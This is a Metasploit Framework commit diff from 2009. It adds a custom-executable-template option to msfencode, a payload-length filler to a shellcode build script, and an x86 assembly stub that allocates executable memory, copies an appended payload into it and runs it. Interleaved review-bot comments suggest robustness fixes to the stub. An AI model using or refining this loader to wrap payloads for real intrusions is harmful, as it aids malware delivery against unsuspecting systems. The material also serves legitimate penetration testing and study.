
This patch implements a much more flexible executable creation scheme…

… at the cost of exe size. This also adds the "-x" option to msfencode, allowing the user to specify their own executable template for generation.

git-svn-id: file:///home/svn/framework3/trunk@7315 4d416f70-5f16-0410-b530-b9f4589650da
1 parent 2c15be2 commit 21e82d8b69156aa5b69ce9072d0543f516ee5862 HD Moore committed Nov 1, 2009
Binary file not shown.
@@ -61,6 +61,7 @@ def xmit( name, dump_ruby=True ):
print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) )
xmit_offset( data, "Port", pack( ">H", 4444 ) ) # 4444
xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) ) # 127.0.0.1
+ xmit_offset( data, "CodeLen", pack( "<L", 0x12345678 ) ) # Filler
xmit_offset( data, "ExitFunk", pack( "<L", 0x0A2A1DE0 ) ) # kernel32.dll!ExitThread
xmit_offset( data, "ExitFunk", pack( "<L", 0x56A2B5F0 ) ) # kernel32.dll!ExitProcess
xmit_offset( data, "ExitFunk", pack( "<L", 0xEA320EFE ) ) # kernel32.dll!SetUnhandledExceptionFilter
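Review bot: The new `CodeLen` line packs its filler with `"<L"` while the neighbouring `Port`/`Host` entries use `">H"`/`">L"`, and the comment `# Filler` does not say why or what replaces it; little-endian is correct here because the value is consumed as an x86 immediate (`mov esi,0x12345678` in the new stub), but that should be stated. Suggest `# Filler: patched to the byte length of the appended payload; little-endian since it lands in an x86 immediate`. If `xmit_offset` locates the slot by searching for the 0x12345678 byte pattern (its body is outside the hunk), the note should also record that the pattern must not occur anywhere else in the assembled stub, otherwise the lookup is ambiguous.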
@@ -95,4 +96,4 @@ def main( argv=None ):
#=============================================================================#
if __name__ == "__main__":
main()
-#=============================================================================#
+#=============================================================================#
@@ -0,0 +1,52 @@
+;-----------------------------------------------------------------------------;
+; Author: (mostly) Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (31 October 2009)
+; Size:
+; Build: >build.py wrapped_jmp
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+[ORG 0]
+
+ cld ; Clear the direction flag.
+ call start ; Call start, this pushes the address of 'api_call' onto the stack.
+delta: ;
+%include "./src/block/block_api.asm" ;
+start: ;
+ pop ebp ; Pop off the address of 'api_call' for calling later.
+
+allocate_size:
+ mov esi,0x12345678
+
+allocate:
+ push byte 0x40 ; PAGE_EXECUTE_READWRITE
+ push 0x1000 ; MEM_COMMIT
+ push esi ; Push the length value of the wrapped code block
+ push byte 0 ; NULL as we dont care where the allocation is.
+ push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
+ call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+
+ mov ebx, eax ; Store allocated address in ebx
+ mov edi, eax ; Prepare EDI with the new address
+ mov ecx, esi ; Prepare ECX with the length of the code
+ call get_payload
+got_payload:
+ pop esi ; Prepare ESI with the source to copy
+ rep movsb ; Copy the payload to RWX memory
+ call set_handler ; Configure error handling
+
+exitblock:
+%include "./src/block/block_exitfunk.asm"
+set_handler:
+ xor eax,eax
+ push dword [fs:eax]
+ mov dword [fs:eax], esp
+ call ebx
+ jmp short exitblock
+
+get_payload:
+ call got_payload
+payload:
+; Append an arbitary payload here
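Review bot: The VirtualAlloc return value after `call ebp` under `allocate` is never checked, so a NULL result flows into `mov edi, eax`, `rep movsb` then writes the payload to address 0 and `call ebx` jumps there; add `test eax, eax` / `jz exitblock` directly after the call (this assumes the included block_exitfunk only depends on ebp, which is outside the hunk). `allocate_size` carries no comment tying the immediate to the build script, e.g. `mov esi,0x12345678 ; CodeLen: patched by build.py to the byte length of the appended payload`. `set_handler` depends on the return address pushed by `call set_handler` (the `exitblock` label) sitting at esp+4 so that it becomes the Handler field of the EXCEPTION_REGISTRATION record that `push dword [fs:eax]` completes; that invariant deserves a comment above the push, since any extra push between the call and it silently installs garbage as the handler. The header's `; Size:` field is left blank and `arbitary` in the trailing comment should read `arbitrary`.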
+
